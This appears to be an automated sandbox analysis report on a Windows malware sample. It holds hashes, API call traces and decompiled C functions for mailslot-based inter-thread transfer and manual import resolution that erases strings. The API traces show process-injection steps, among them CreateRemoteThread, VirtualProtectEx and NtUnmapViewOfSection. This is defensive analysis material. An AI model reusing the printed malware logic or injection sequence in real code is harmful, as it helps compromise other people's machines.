  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
